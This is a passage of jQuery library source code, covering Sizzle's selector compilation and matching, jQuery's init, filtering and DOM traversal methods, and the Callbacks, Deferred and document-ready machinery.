		Sizzle( selector, contexts[i], results );
	}
	return results;
}

function condense( unmatched, map, filter, context, xml ) {
	var elem,
		newUnmatched = [],
		i = 0,
		len = unmatched.length,
		mapped = map != null;

	for ( ; i < len; i++ ) {
		if ( (elem = unmatched[i]) ) {
			if ( !filter || filter( elem, context, xml ) ) {
				newUnmatched.push( elem );
				if ( mapped ) {
					map.push( i );
				}
			}
		}
	}

	return newUnmatched;
}

function setMatcher( preFilter, selector, matcher, postFilter, postFinder, postSelector ) {
	if ( postFilter && !postFilter[ expando ] ) {
		postFilter = setMatcher( postFilter );
	}
	if ( postFinder && !postFinder[ expando ] ) {
		postFinder = setMatcher( postFinder, postSelector );
	}
	return markFunction(function( seed, results, context, xml ) {
		var temp, i, elem,
			preMap = [],
			postMap = [],
			preexisting = results.length,

			// Get initial elements from seed or context
			elems = seed || multipleContexts( selector || "*", context.nodeType ? [ context ] : context, [] ),

			// Prefilter to get matcher input, preserving a map for seed-results synchronization
			matcherIn = preFilter && ( seed || !selector ) ?
				condense( elems, preMap, preFilter, context, xml ) :
				elems,

			matcherOut = matcher ?
				// If we have a postFinder, or filtered seed, or non-seed postFilter or preexisting results,
				postFinder || ( seed ? preFilter : preexisting || postFilter ) ?

					// ...intermediate processing is necessary
					[] :

					// ...otherwise use results directly
					results :
				matcherIn;

		// Find primary matches
		if ( matcher ) {
			matcher( matcherIn, matcherOut, context, xml );
		}

		// Apply postFilter
		if ( postFilter ) {
			temp = condense( matcherOut, postMap );
			postFilter( temp, [], context, xml );

			// Un-match failing elements by moving them back to matcherIn
			i = temp.length;
			while ( i-- ) {
				if ( (elem = temp[i]) ) {
					matcherOut[ postMap[i] ] = !(matcherIn[ postMap[i] ] = elem);
				}
			}
		}

		if ( seed ) {
			if ( postFinder || preFilter ) {
				if ( postFinder ) {
					// Get the final matcherOut by condensing this intermediate into postFinder contexts
					temp = [];
					i = matcherOut.length;
					while ( i-- ) {
						if ( (elem = matcherOut[i]) ) {
							// Restore matcherIn since elem is not yet a final match
							temp.push( (matcherIn[i] = elem) );
						}
					}
					postFinder( null, (matcherOut = []), temp, xml );
				}

				// Move matched elements from seed to results to keep them synchronized
				i = matcherOut.length;
				while ( i-- ) {
					if ( (elem = matcherOut[i]) &&
						(temp = postFinder ? indexOf( seed, elem ) : preMap[i]) > -1 ) {

						seed[temp] = !(results[temp] = elem);
					}
				}
			}

		// Add elements to results, through postFinder if defined
		} else {
			matcherOut = condense(
				matcherOut === results ?
					matcherOut.splice( preexisting, matcherOut.length ) :
					matcherOut
			);
			if ( postFinder ) {
				postFinder( null, results, matcherOut, xml );
			} else {
				push.apply( results, matcherOut );
			}
		}
	});
}

function matcherFromTokens( tokens ) {
	var checkContext, matcher, j,
		len = tokens.length,
		leadingRelative = Expr.relative[ tokens[0].type ],
		implicitRelative = leadingRelative || Expr.relative[" "],
		i = leadingRelative ? 1 : 0,

		// The foundational matcher ensures that elements are reachable from top-level context(s)
		matchContext = addCombinator( function( elem ) {
			return elem === checkContext;
		}, implicitRelative, true ),
		matchAnyContext = addCombinator( function( elem ) {
			return indexOf( checkContext, elem ) > -1;
		}, implicitRelative, true ),
		matchers = [ function( elem, context, xml ) {
			var ret = ( !leadingRelative && ( xml || context !== outermostContext ) ) || (
				(checkContext = context).nodeType ?
					matchContext( elem, context, xml ) :
					matchAnyContext( elem, context, xml ) );
			// Avoid hanging onto element (issue #299)
			checkContext = null;
			return ret;
		} ];

	for ( ; i < len; i++ ) {
		if ( (matcher = Expr.relative[ tokens[i].type ]) ) {
			matchers = [ addCombinator(elementMatcher( matchers ), matcher) ];
		} else {
			matcher = Expr.filter[ tokens[i].type ].apply( null, tokens[i].matches );

			// Return special upon seeing a positional matcher
			if ( matcher[ expando ] ) {
				// Find the next relative operator (if any) for proper handling
				j = ++i;
				for ( ; j < len; j++ ) {
					if ( Expr.relative[ tokens[j].type ] ) {
						break;
					}
				}
				return setMatcher(
					i > 1 && elementMatcher( matchers ),
					i > 1 && toSelector(
						// If the preceding token was a descendant combinator, insert an implicit any-element `*`
						tokens.slice( 0, i - 1 ).concat({ value: tokens[ i - 2 ].type === " " ? "*" : "" })
					).replace( rtrim, "$1" ),
					matcher,
					i < j && matcherFromTokens( tokens.slice( i, j ) ),
					j < len && matcherFromTokens( (tokens = tokens.slice( j )) ),
					j < len && toSelector( tokens )
				);
			}
			matchers.push( matcher );
		}
	}

	return elementMatcher( matchers );
}

function matcherFromGroupMatchers( elementMatchers, setMatchers ) {
	var bySet = setMatchers.length > 0,
		byElement = elementMatchers.length > 0,
		superMatcher = function( seed, context, xml, results, outermost ) {
			var elem, j, matcher,
				matchedCount = 0,
				i = "0",
				unmatched = seed && [],
				setMatched = [],
				contextBackup = outermostContext,
				// We must always have either seed elements or outermost context
				elems = seed || byElement && Expr.find["TAG"]( "*", outermost ),
				// Use integer dirruns iff this is the outermost matcher
				dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1),
				len = elems.length;

			if ( outermost ) {
				outermostContext = context !== document && context;
			}

			// Add elements passing elementMatchers directly to results
			// Keep `i` a string if there are no elements so `matchedCount` will be "00" below
			// Support: IE<9, Safari
			// Tolerate NodeList properties (IE: "length"; Safari: <number>) matching elements by id
			for ( ; i !== len && (elem = elems[i]) != null; i++ ) {
				if ( byElement && elem ) {
					j = 0;
					while ( (matcher = elementMatchers[j++]) ) {
						if ( matcher( elem, context, xml ) ) {
							results.push( elem );
							break;
						}
					}
					if ( outermost ) {
						dirruns = dirrunsUnique;
					}
				}

				// Track unmatched elements for set filters
				if ( bySet ) {
					// They will have gone through all possible matchers
					if ( (elem = !matcher && elem) ) {
						matchedCount--;
					}

					// Lengthen the array for every element, matched or not
					if ( seed ) {
						unmatched.push( elem );
					}
				}
			}

			// Apply set filters to unmatched elements
			matchedCount += i;
			if ( bySet && i !== matchedCount ) {
				j = 0;
				while ( (matcher = setMatchers[j++]) ) {
					matcher( unmatched, setMatched, context, xml );
				}

				if ( seed ) {
					// Reintegrate element matches to eliminate the need for sorting
					if ( matchedCount > 0 ) {
						while ( i-- ) {
							if ( !(unmatched[i] || setMatched[i]) ) {
								setMatched[i] = pop.call( results );
							}
						}
					}

					// Discard index placeholder values to get only actual matches
					setMatched = condense( setMatched );
				}

				// Add matches to results
				push.apply( results, setMatched );

				// Seedless set matches succeeding multiple successful matchers stipulate sorting
				if ( outermost && !seed && setMatched.length > 0 &&
					( matchedCount + setMatchers.length ) > 1 ) {

					Sizzle.uniqueSort( results );
				}
			}

			// Override manipulation of globals by nested matchers
			if ( outermost ) {
				dirruns = dirrunsUnique;
				outermostContext = contextBackup;
			}

			return unmatched;
		};

	return bySet ?
		markFunction( superMatcher ) :
		superMatcher;
}

compile = Sizzle.compile = function( selector, match /* Internal Use Only */ ) {
	var i,
		setMatchers = [],
		elementMatchers = [],
		cached = compilerCache[ selector + " " ];

	if ( !cached ) {
		// Generate a function of recursive functions that can be used to check each element
		if ( !match ) {
			match = tokenize( selector );
		}
		i = match.length;
		while ( i-- ) {
			cached = matcherFromTokens( match[i] );
			if ( cached[ expando ] ) {
				setMatchers.push( cached );
			} else {
				elementMatchers.push( cached );
			}
		}

		// Cache the compiled function
		cached = compilerCache( selector, matcherFromGroupMatchers( elementMatchers, setMatchers ) );

		// Save selector and tokenization
		cached.selector = selector;
	}
	return cached;
};

/**
 * A low-level selection function that works with Sizzle's compiled
 *  selector functions
 * @param {String|Function} selector A selector or a pre-compiled
 *  selector function built with Sizzle.compile
 * @param {Element} context
 * @param {Array} [results]
 * @param {Array} [seed] A set of elements to match against
 */
select = Sizzle.select = function( selector, context, results, seed ) {
	var i, tokens, token, type, find,
		compiled = typeof selector === "function" && selector,
		match = !seed && tokenize( (selector = compiled.selector || selector) );

	results = results || [];

	// Try to minimize operations if there is no seed and only one group
	if ( match.length === 1 ) {

		// Take a shortcut and set the context if the root selector is an ID
		tokens = match[0] = match[0].slice( 0 );
		if ( tokens.length > 2 && (token = tokens[0]).type === "ID" &&
				support.getById && context.nodeType === 9 && documentIsHTML &&
				Expr.relative[ tokens[1].type ] ) {

			context = ( Expr.find["ID"]( token.matches[0].replace(runescape, funescape), context ) || [] )[0];
			if ( !context ) {
				return results;

			// Precompiled matchers will still verify ancestry, so step up a level
			} else if ( compiled ) {
				context = context.parentNode;
			}

			selector = selector.slice( tokens.shift().value.length );
		}

		// Fetch a seed set for right-to-left matching
		i = matchExpr["needsContext"].test( selector ) ? 0 : tokens.length;
		while ( i-- ) {
			token = tokens[i];

			// Abort if we hit a combinator
			if ( Expr.relative[ (type = token.type) ] ) {
				break;
			}
			if ( (find = Expr.find[ type ]) ) {
				// Search, expanding context for leading sibling combinators
				if ( (seed = find(
					token.matches[0].replace( runescape, funescape ),
					rsibling.test( tokens[0].type ) && testContext( context.parentNode ) || context
				)) ) {

					// If seed is empty or no tokens remain, we can return early
					tokens.splice( i, 1 );
					selector = seed.length && toSelector( tokens );
					if ( !selector ) {
						push.apply( results, seed );
						return results;
					}

					break;
				}
			}
		}
	}

	// Compile and execute a filtering function if one is not provided
	// Provide `match` to avoid retokenization if we modified the selector above
	( compiled || compile( selector, match ) )(
		seed,
		context,
		!documentIsHTML,
		results,
		rsibling.test( selector ) && testContext( context.parentNode ) || context
	);
	return results;
};

// One-time assignments

// Sort stability
support.sortStable = expando.split("").sort( sortOrder ).join("") === expando;

// Support: Chrome 14-35+
// Always assume duplicates if they aren't passed to the comparison function
support.detectDuplicates = !!hasDuplicate;

// Initialize against the default document
setDocument();

// Support: Webkit<537.32 - Safari 6.0.3/Chrome 25 (fixed in Chrome 27)
// Detached nodes confoundingly follow *each other*
support.sortDetached = assert(function( div1 ) {
	// Should return 1, but returns 4 (following)
	return div1.compareDocumentPosition( document.createElement("div") ) & 1;
});

// Support: IE<8
// Prevent attribute/property "interpolation"
// http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx
if ( !assert(function( div ) {
	div.innerHTML = "<a href='#'></a>";
	return div.firstChild.getAttribute("href") === "#" ;
}) ) {
	addHandle( "type|href|height|width", function( elem, name, isXML ) {
		if ( !isXML ) {
			return elem.getAttribute( name, name.toLowerCase() === "type" ? 1 : 2 );
		}
	});
}

// Support: IE<9
// Use defaultValue in place of getAttribute("value")
if ( !support.attributes || !assert(function( div ) {
	div.innerHTML = "<input/>";
	div.firstChild.setAttribute( "value", "" );
	return div.firstChild.getAttribute( "value" ) === "";
}) ) {
	addHandle( "value", function( elem, name, isXML ) {
		if ( !isXML && elem.nodeName.toLowerCase() === "input" ) {
			return elem.defaultValue;
		}
	});
}

// Support: IE<9
// Use getAttributeNode to fetch booleans when getAttribute lies
if ( !assert(function( div ) {
	return div.getAttribute("disabled") == null;
}) ) {
	addHandle( booleans, function( elem, name, isXML ) {
		var val;
		if ( !isXML ) {
			return elem[ name ] === true ? name.toLowerCase() :
					(val = elem.getAttributeNode( name )) && val.specified ?
					val.value :
				null;
		}
	});
}

return Sizzle;

})( window );



jQuery.find = Sizzle;
jQuery.expr = Sizzle.selectors;
jQuery.expr[":"] = jQuery.expr.pseudos;
jQuery.unique = Sizzle.uniqueSort;
jQuery.text = Sizzle.getText;
jQuery.isXMLDoc = Sizzle.isXML;
jQuery.contains = Sizzle.contains;



var rneedsContext = jQuery.expr.match.needsContext;

var rsingleTag = (/^<(\w+)\s*\/?>(?:<\/\1>|)$/);



var risSimple = /^.[^:#\[\.,]*$/;

// Implement the identical functionality for filter and not
function winnow( elements, qualifier, not ) {
	if ( jQuery.isFunction( qualifier ) ) {
		return jQuery.grep( elements, function( elem, i ) {
			/* jshint -W018 */
			return !!qualifier.call( elem, i, elem ) !== not;
		});

	}

	if ( qualifier.nodeType ) {
		return jQuery.grep( elements, function( elem ) {
			return ( elem === qualifier ) !== not;
		});

	}

	if ( typeof qualifier === "string" ) {
		if ( risSimple.test( qualifier ) ) {
			return jQuery.filter( qualifier, elements, not );
		}

		qualifier = jQuery.filter( qualifier, elements );
	}

	return jQuery.grep( elements, function( elem ) {
		return ( indexOf.call( qualifier, elem ) >= 0 ) !== not;
	});
}

jQuery.filter = function( expr, elems, not ) {
	var elem = elems[ 0 ];

	if ( not ) {
		expr = ":not(" + expr + ")";
	}

	return elems.length === 1 && elem.nodeType === 1 ?
		jQuery.find.matchesSelector( elem, expr ) ? [ elem ] : [] :
		jQuery.find.matches( expr, jQuery.grep( elems, function( elem ) {
			return elem.nodeType === 1;
		}));
};

jQuery.fn.extend({
	find: function( selector ) {
		var i,
			len = this.length,
			ret = [],
			self = this;

		if ( typeof selector !== "string" ) {
			return this.pushStack( jQuery( selector ).filter(function() {
				for ( i = 0; i < len; i++ ) {
					if ( jQuery.contains( self[ i ], this ) ) {
						return true;
					}
				}
			}) );
		}

		for ( i = 0; i < len; i++ ) {
			jQuery.find( selector, self[ i ], ret );
		}

		// Needed because $( selector, context ) becomes $( context ).find( selector )
		ret = this.pushStack( len > 1 ? jQuery.unique( ret ) : ret );
		ret.selector = this.selector ? this.selector + " " + selector : selector;
		return ret;
	},
	filter: function( selector ) {
		return this.pushStack( winnow(this, selector || [], false) );
	},
	not: function( selector ) {
		return this.pushStack( winnow(this, selector || [], true) );
	},
	is: function( selector ) {
		return !!winnow(
			this,

			// If this is a positional/relative selector, check membership in the returned set
			// so $("p:first").is("p:last") won't return true for a doc with two "p".
			typeof selector === "string" && rneedsContext.test( selector ) ?
				jQuery( selector ) :
				selector || [],
			false
		).length;
	}
});


// Initialize a jQuery object


// A central reference to the root jQuery(document)
var rootjQuery,

	// A simple way to check for HTML strings
	// Prioritize #id over <tag> to avoid XSS via location.hash (#9521)
	// Strict HTML recognition (#11290: must start with <)
	rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,

	init = jQuery.fn.init = function( selector, context ) {
		var match, elem;

		// HANDLE: $(""), $(null), $(undefined), $(false)
		if ( !selector ) {
			return this;
		}

		// Handle HTML strings
		if ( typeof selector === "string" ) {
			if ( selector[0] === "<" && selector[ selector.length - 1 ] === ">" && selector.length >= 3 ) {
				// Assume that strings that start and end with <> are HTML and skip the regex check
				match = [ null, selector, null ];

			} else {
				match = rquickExpr.exec( selector );
			}

			// Match html or make sure no context is specified for #id
			if ( match && (match[1] || !context) ) {

				// HANDLE: $(html) -> $(array)
				if ( match[1] ) {
					context = context instanceof jQuery ? context[0] : context;

					// Option to run scripts is true for back-compat
					// Intentionally let the error be thrown if parseHTML is not present
					jQuery.merge( this, jQuery.parseHTML(
						match[1],
						context && context.nodeType ? context.ownerDocument || context : document,
						true
					) );

					// HANDLE: $(html, props)
					if ( rsingleTag.test( match[1] ) && jQuery.isPlainObject( context ) ) {
						for ( match in context ) {
							// Properties of context are called as methods if possible
							if ( jQuery.isFunction( this[ match ] ) ) {
								this[ match ]( context[ match ] );

							// ...and otherwise set as attributes
							} else {
								this.attr( match, context[ match ] );
							}
						}
					}

					return this;

				// HANDLE: $(#id)
				} else {
					elem = document.getElementById( match[2] );

					// Support: Blackberry 4.6
					// gEBID returns nodes no longer in the document (#6963)
					if ( elem && elem.parentNode ) {
						// Inject the element directly into the jQuery object
						this.length = 1;
						this[0] = elem;
					}

					this.context = document;
					this.selector = selector;
					return this;
				}

			// HANDLE: $(expr, $(...))
			} else if ( !context || context.jquery ) {
				return ( context || rootjQuery ).find( selector );

			// HANDLE: $(expr, context)
			// (which is just equivalent to: $(context).find(expr)
			} else {
				return this.constructor( context ).find( selector );
			}

		// HANDLE: $(DOMElement)
		} else if ( selector.nodeType ) {
			this.context = this[0] = selector;
			this.length = 1;
			return this;

		// HANDLE: $(function)
		// Shortcut for document ready
		} else if ( jQuery.isFunction( selector ) ) {
			return typeof rootjQuery.ready !== "undefined" ?
				rootjQuery.ready( selector ) :
				// Execute immediately if ready is not present
				selector( jQuery );
		}

		if ( selector.selector !== undefined ) {
			this.selector = selector.selector;
			this.context = selector.context;
		}

		return jQuery.makeArray( selector, this );
	};

// Give the init function the jQuery prototype for later instantiation
init.prototype = jQuery.fn;

// Initialize central reference
rootjQuery = jQuery( document );


var rparentsprev = /^(?:parents|prev(?:Until|All))/,
	// Methods guaranteed to produce a unique set when starting from a unique set
	guaranteedUnique = {
		children: true,
		contents: true,
		next: true,
		prev: true
	};

jQuery.extend({
	dir: function( elem, dir, until ) {
		var matched = [],
			truncate = until !== undefined;

		while ( (elem = elem[ dir ]) && elem.nodeType !== 9 ) {
			if ( elem.nodeType === 1 ) {
				if ( truncate && jQuery( elem ).is( until ) ) {
					break;
				}
				matched.push( elem );
			}
		}
		return matched;
	},

	sibling: function( n, elem ) {
		var matched = [];

		for ( ; n; n = n.nextSibling ) {
			if ( n.nodeType === 1 && n !== elem ) {
				matched.push( n );
			}
		}

		return matched;
	}
});

jQuery.fn.extend({
	has: function( target ) {
		var targets = jQuery( target, this ),
			l = targets.length;

		return this.filter(function() {
			var i = 0;
			for ( ; i < l; i++ ) {
				if ( jQuery.contains( this, targets[i] ) ) {
					return true;
				}
			}
		});
	},

	closest: function( selectors, context ) {
		var cur,
			i = 0,
			l = this.length,
			matched = [],
			pos = rneedsContext.test( selectors ) || typeof selectors !== "string" ?
				jQuery( selectors, context || this.context ) :
				0;

		for ( ; i < l; i++ ) {
			for ( cur = this[i]; cur && cur !== context; cur = cur.parentNode ) {
				// Always skip document fragments
				if ( cur.nodeType < 11 && (pos ?
					pos.index(cur) > -1 :

					// Don't pass non-elements to Sizzle
					cur.nodeType === 1 &&
						jQuery.find.matchesSelector(cur, selectors)) ) {

					matched.push( cur );
					break;
				}
			}
		}

		return this.pushStack( matched.length > 1 ? jQuery.unique( matched ) : matched );
	},

	// Determine the position of an element within the set
	index: function( elem ) {

		// No argument, return index in parent
		if ( !elem ) {
			return ( this[ 0 ] && this[ 0 ].parentNode ) ? this.first().prevAll().length : -1;
		}

		// Index in selector
		if ( typeof elem === "string" ) {
			return indexOf.call( jQuery( elem ), this[ 0 ] );
		}

		// Locate the position of the desired element
		return indexOf.call( this,

			// If it receives a jQuery object, the first element is used
			elem.jquery ? elem[ 0 ] : elem
		);
	},

	add: function( selector, context ) {
		return this.pushStack(
			jQuery.unique(
				jQuery.merge( this.get(), jQuery( selector, context ) )
			)
		);
	},

	addBack: function( selector ) {
		return this.add( selector == null ?
			this.prevObject : this.prevObject.filter(selector)
		);
	}
});

function sibling( cur, dir ) {
	while ( (cur = cur[dir]) && cur.nodeType !== 1 ) {}
	return cur;
}

jQuery.each({
	parent: function( elem ) {
		var parent = elem.parentNode;
		return parent && parent.nodeType !== 11 ? parent : null;
	},
	parents: function( elem ) {
		return jQuery.dir( elem, "parentNode" );
	},
	parentsUntil: function( elem, i, until ) {
		return jQuery.dir( elem, "parentNode", until );
	},
	next: function( elem ) {
		return sibling( elem, "nextSibling" );
	},
	prev: function( elem ) {
		return sibling( elem, "previousSibling" );
	},
	nextAll: function( elem ) {
		return jQuery.dir( elem, "nextSibling" );
	},
	prevAll: function( elem ) {
		return jQuery.dir( elem, "previousSibling" );
	},
	nextUntil: function( elem, i, until ) {
		return jQuery.dir( elem, "nextSibling", until );
	},
	prevUntil: function( elem, i, until ) {
		return jQuery.dir( elem, "previousSibling", until );
	},
	siblings: function( elem ) {
		return jQuery.sibling( ( elem.parentNode || {} ).firstChild, elem );
	},
	children: function( elem ) {
		return jQuery.sibling( elem.firstChild );
	},
	contents: function( elem ) {
		return elem.contentDocument || jQuery.merge( [], elem.childNodes );
	}
}, function( name, fn ) {
	jQuery.fn[ name ] = function( until, selector ) {
		var matched = jQuery.map( this, fn, until );

		if ( name.slice( -5 ) !== "Until" ) {
			selector = until;
		}

		if ( selector && typeof selector === "string" ) {
			matched = jQuery.filter( selector, matched );
		}

		if ( this.length > 1 ) {
			// Remove duplicates
			if ( !guaranteedUnique[ name ] ) {
				jQuery.unique( matched );
			}

			// Reverse order for parents* and prev-derivatives
			if ( rparentsprev.test( name ) ) {
				matched.reverse();
			}
		}

		return this.pushStack( matched );
	};
});
var rnotwhite = (/\S+/g);



// String to Object options format cache
var optionsCache = {};

// Convert String-formatted options into Object-formatted ones and store in cache
function createOptions( options ) {
	var object = optionsCache[ options ] = {};
	jQuery.each( options.match( rnotwhite ) || [], function( _, flag ) {
		object[ flag ] = true;
	});
	return object;
}

/*
 * Create a callback list using the following parameters:
 *
 *	options: an optional list of space-separated options that will change how
 *			the callback list behaves or a more traditional option object
 *
 * By default a callback list will act like an event callback list and can be
 * "fired" multiple times.
 *
 * Possible options:
 *
 *	once:			will ensure the callback list can only be fired once (like a Deferred)
 *
 *	memory:			will keep track of previous values and will call any callback added
 *					after the list has been fired right away with the latest "memorized"
 *					values (like a Deferred)
 *
 *	unique:			will ensure a callback can only be added once (no duplicate in the list)
 *
 *	stopOnFalse:	interrupt callings when a callback returns false
 *
 */
jQuery.Callbacks = function( options ) {

	// Convert options from String-formatted to Object-formatted if needed
	// (we check in cache first)
	options = typeof options === "string" ?
		( optionsCache[ options ] || createOptions( options ) ) :
		jQuery.extend( {}, options );

	var // Last fire value (for non-forgettable lists)
		memory,
		// Flag to know if list was already fired
		fired,
		// Flag to know if list is currently firing
		firing,
		// First callback to fire (used internally by add and fireWith)
		firingStart,
		// End of the loop when firing
		firingLength,
		// Index of currently firing callback (modified by remove if needed)
		firingIndex,
		// Actual callback list
		list = [],
		// Stack of fire calls for repeatable lists
		stack = !options.once && [],
		// Fire callbacks
		fire = function( data ) {
			memory = options.memory && data;
			fired = true;
			firingIndex = firingStart || 0;
			firingStart = 0;
			firingLength = list.length;
			firing = true;
			for ( ; list && firingIndex < firingLength; firingIndex++ ) {
				if ( list[ firingIndex ].apply( data[ 0 ], data[ 1 ] ) === false && options.stopOnFalse ) {
					memory = false; // To prevent further calls using add
					break;
				}
			}
			firing = false;
			if ( list ) {
				if ( stack ) {
					if ( stack.length ) {
						fire( stack.shift() );
					}
				} else if ( memory ) {
					list = [];
				} else {
					self.disable();
				}
			}
		},
		// Actual Callbacks object
		self = {
			// Add a callback or a collection of callbacks to the list
			add: function() {
				if ( list ) {
					// First, we save the current length
					var start = list.length;
					(function add( args ) {
						jQuery.each( args, function( _, arg ) {
							var type = jQuery.type( arg );
							if ( type === "function" ) {
								if ( !options.unique || !self.has( arg ) ) {
									list.push( arg );
								}
							} else if ( arg && arg.length && type !== "string" ) {
								// Inspect recursively
								add( arg );
							}
						});
					})( arguments );
					// Do we need to add the callbacks to the
					// current firing batch?
					if ( firing ) {
						firingLength = list.length;
					// With memory, if we're not firing then
					// we should call right away
					} else if ( memory ) {
						firingStart = start;
						fire( memory );
					}
				}
				return this;
			},
			// Remove a callback from the list
			remove: function() {
				if ( list ) {
					jQuery.each( arguments, function( _, arg ) {
						var index;
						while ( ( index = jQuery.inArray( arg, list, index ) ) > -1 ) {
							list.splice( index, 1 );
							// Handle firing indexes
							if ( firing ) {
								if ( index <= firingLength ) {
									firingLength--;
								}
								if ( index <= firingIndex ) {
									firingIndex--;
								}
							}
						}
					});
				}
				return this;
			},
			// Check if a given callback is in the list.
			// If no argument is given, return whether or not list has callbacks attached.
			has: function( fn ) {
				return fn ? jQuery.inArray( fn, list ) > -1 : !!( list && list.length );
			},
			// Remove all callbacks from the list
			empty: function() {
				list = [];
				firingLength = 0;
				return this;
			},
			// Have the list do nothing anymore
			disable: function() {
				list = stack = memory = undefined;
				return this;
			},
			// Is it disabled?
			disabled: function() {
				return !list;
			},
			// Lock the list in its current state
			lock: function() {
				stack = undefined;
				if ( !memory ) {
					self.disable();
				}
				return this;
			},
			// Is it locked?
			locked: function() {
				return !stack;
			},
			// Call all callbacks with the given context and arguments
			fireWith: function( context, args ) {
				if ( list && ( !fired || stack ) ) {
					args = args || [];
					args = [ context, args.slice ? args.slice() : args ];
					if ( firing ) {
						stack.push( args );
					} else {
						fire( args );
					}
				}
				return this;
			},
			// Call all the callbacks with the given arguments
			fire: function() {
				self.fireWith( this, arguments );
				return this;
			},
			// To know if the callbacks have already been called at least once
			fired: function() {
				return !!fired;
			}
		};

	return self;
};


jQuery.extend({

	Deferred: function( func ) {
		var tuples = [
				// action, add listener, listener list, final state
				[ "resolve", "done", jQuery.Callbacks("once memory"), "resolved" ],
				[ "reject", "fail", jQuery.Callbacks("once memory"), "rejected" ],
				[ "notify", "progress", jQuery.Callbacks("memory") ]
			],
			state = "pending",
			promise = {
				state: function() {
					return state;
				},
				always: function() {
					deferred.done( arguments ).fail( arguments );
					return this;
				},
				then: function( /* fnDone, fnFail, fnProgress */ ) {
					var fns = arguments;
					return jQuery.Deferred(function( newDefer ) {
						jQuery.each( tuples, function( i, tuple ) {
							var fn = jQuery.isFunction( fns[ i ] ) && fns[ i ];
							// deferred[ done | fail | progress ] for forwarding actions to newDefer
							deferred[ tuple[1] ](function() {
								var returned = fn && fn.apply( this, arguments );
								if ( returned && jQuery.isFunction( returned.promise ) ) {
									returned.promise()
										.done( newDefer.resolve )
										.fail( newDefer.reject )
										.progress( newDefer.notify );
								} else {
									newDefer[ tuple[ 0 ] + "With" ]( this === promise ? newDefer.promise() : this, fn ? [ returned ] : arguments );
								}
							});
						});
						fns = null;
					}).promise();
				},
				// Get a promise for this deferred
				// If obj is provided, the promise aspect is added to the object
				promise: function( obj ) {
					return obj != null ? jQuery.extend( obj, promise ) : promise;
				}
			},
			deferred = {};

		// Keep pipe for back-compat
		promise.pipe = promise.then;

		// Add list-specific methods
		jQuery.each( tuples, function( i, tuple ) {
			var list = tuple[ 2 ],
				stateString = tuple[ 3 ];

			// promise[ done | fail | progress ] = list.add
			promise[ tuple[1] ] = list.add;

			// Handle state
			if ( stateString ) {
				list.add(function() {
					// state = [ resolved | rejected ]
					state = stateString;

				// [ reject_list | resolve_list ].disable; progress_list.lock
				}, tuples[ i ^ 1 ][ 2 ].disable, tuples[ 2 ][ 2 ].lock );
			}

			// deferred[ resolve | reject | notify ]
			deferred[ tuple[0] ] = function() {
				deferred[ tuple[0] + "With" ]( this === deferred ? promise : this, arguments );
				return this;
			};
			deferred[ tuple[0] + "With" ] = list.fireWith;
		});

		// Make the deferred a promise
		promise.promise( deferred );

		// Call given func if any
		if ( func ) {
			func.call( deferred, deferred );
		}

		// All done!
		return deferred;
	},

	// Deferred helper
	when: function( subordinate /* , ..., subordinateN */ ) {
		var i = 0,
			resolveValues = slice.call( arguments ),
			length = resolveValues.length,

			// the count of uncompleted subordinates
			remaining = length !== 1 || ( subordinate && jQuery.isFunction( subordinate.promise ) ) ? length : 0,

			// the master Deferred. If resolveValues consist of only a single Deferred, just use that.
			deferred = remaining === 1 ? subordinate : jQuery.Deferred(),

			// Update function for both resolve and progress values
			updateFunc = function( i, contexts, values ) {
				return function( value ) {
					contexts[ i ] = this;
					values[ i ] = arguments.length > 1 ? slice.call( arguments ) : value;
					if ( values === progressValues ) {
						deferred.notifyWith( contexts, values );
					} else if ( !( --remaining ) ) {
						deferred.resolveWith( contexts, values );
					}
				};
			},

			progressValues, progressContexts, resolveContexts;

		// Add listeners to Deferred subordinates; treat others as resolved
		if ( length > 1 ) {
			progressValues = new Array( length );
			progressContexts = new Array( length );
			resolveContexts = new Array( length );
			for ( ; i < length; i++ ) {
				if ( resolveValues[ i ] && jQuery.isFunction( resolveValues[ i ].promise ) ) {
					resolveValues[ i ].promise()
						.done( updateFunc( i, resolveContexts, resolveValues ) )
						.fail( deferred.reject )
						.progress( updateFunc( i, progressContexts, progressValues ) );
				} else {
					--remaining;
				}
			}
		}

		// If we're not waiting on anything, resolve the master
		if ( !remaining ) {
			deferred.resolveWith( resolveContexts, resolveValues );
		}

		return deferred.promise();
	}
});


// The deferred used on DOM ready
var readyList;

jQuery.fn.ready = function( fn ) {
	// Add the callback
	jQuery.ready.promise().done( fn );

	return this;
};

jQuery.extend({
	// Is the DOM ready to be used? Set to true once it occurs.
	isReady: false,

	// A counter to track how many items to wait for before
	// the ready event fires. See #6781
	readyWait: 1,

	// Hold (or release) the ready event
	holdReady: function( hold ) {
		if ( hold ) {
			jQuery.readyWait++;
		} else {
			jQuery.ready( true );
		}
	},

	// Handle when the DOM is ready
	ready: function( wait ) {

		// Abort if there are pending holds or we're already ready
		if ( wait === true ? --jQuery.readyWait : jQuery.isReady ) {
			return;
		}

		// Remember that the DOM is ready
		jQuery.isReady = true;

		// If a normal DOM Ready event fired, decrement, and wait if need be
		if ( wait !== true && --jQuery.readyWait > 0 ) {
			return;
		}

		// If there are functions bound, to execute
		readyList.resolveWith( document, [ jQuery ] );

		// Trigger any bound ready events
		if ( jQuery.fn.triggerHandler ) {
			jQuery( document ).triggerHandler( "ready" );
			jQuery( document ).off( "ready" );
		}
	}
});

/**
 * The ready event handler and self cleanup method
 */
function completed() {
	document.removeEventListener( "DOMContentLoaded", completed, false );
	window.removeEventListener( "load", completed, false );
	jQuery.ready();
}

jQuery.ready.promise = function( obj ) {
	if ( !readyList ) {

		readyList = jQuery.Deferred();

		// Catch cases where $(document).ready() is called after the browser event has already occurred.
		// We once tried to use readyState "interactive" here, but it caused issues like the one
		// discovered by ChrisS here: http://bugs.jquery.com/ticket/12282#comment:15
		if ( document.readyState === "complete" ) {
			// Handle it asynchronously to allow scripts the opportunity to delay ready
			setTimeout( jQuery.ready );

		} else {

			// Use the handy event callback
			document.addEventListener( "DOMContentLoaded", completed, false );

			// A fallback to window.onload, that will always work
			window.addEventListener( "load", completed, false );
		}
	}
	return readyList.promise( obj );
};

// Kick off the DOM ready check even if the user does not
jQuery.ready.promise();




// Multifunctional method to get and set values of a collection
// The value/s can optionally be executed if it's a function
var access = jQuery.access = function( elems, fn, key, value, chainable, emptyGet, raw ) {
	var i = 0,
		len = elems.length,
		bulk = key == null;

	// Sets many values
	if ( jQuery.type( key ) === "object" ) {
		chainable = true;
		for ( i in key ) {
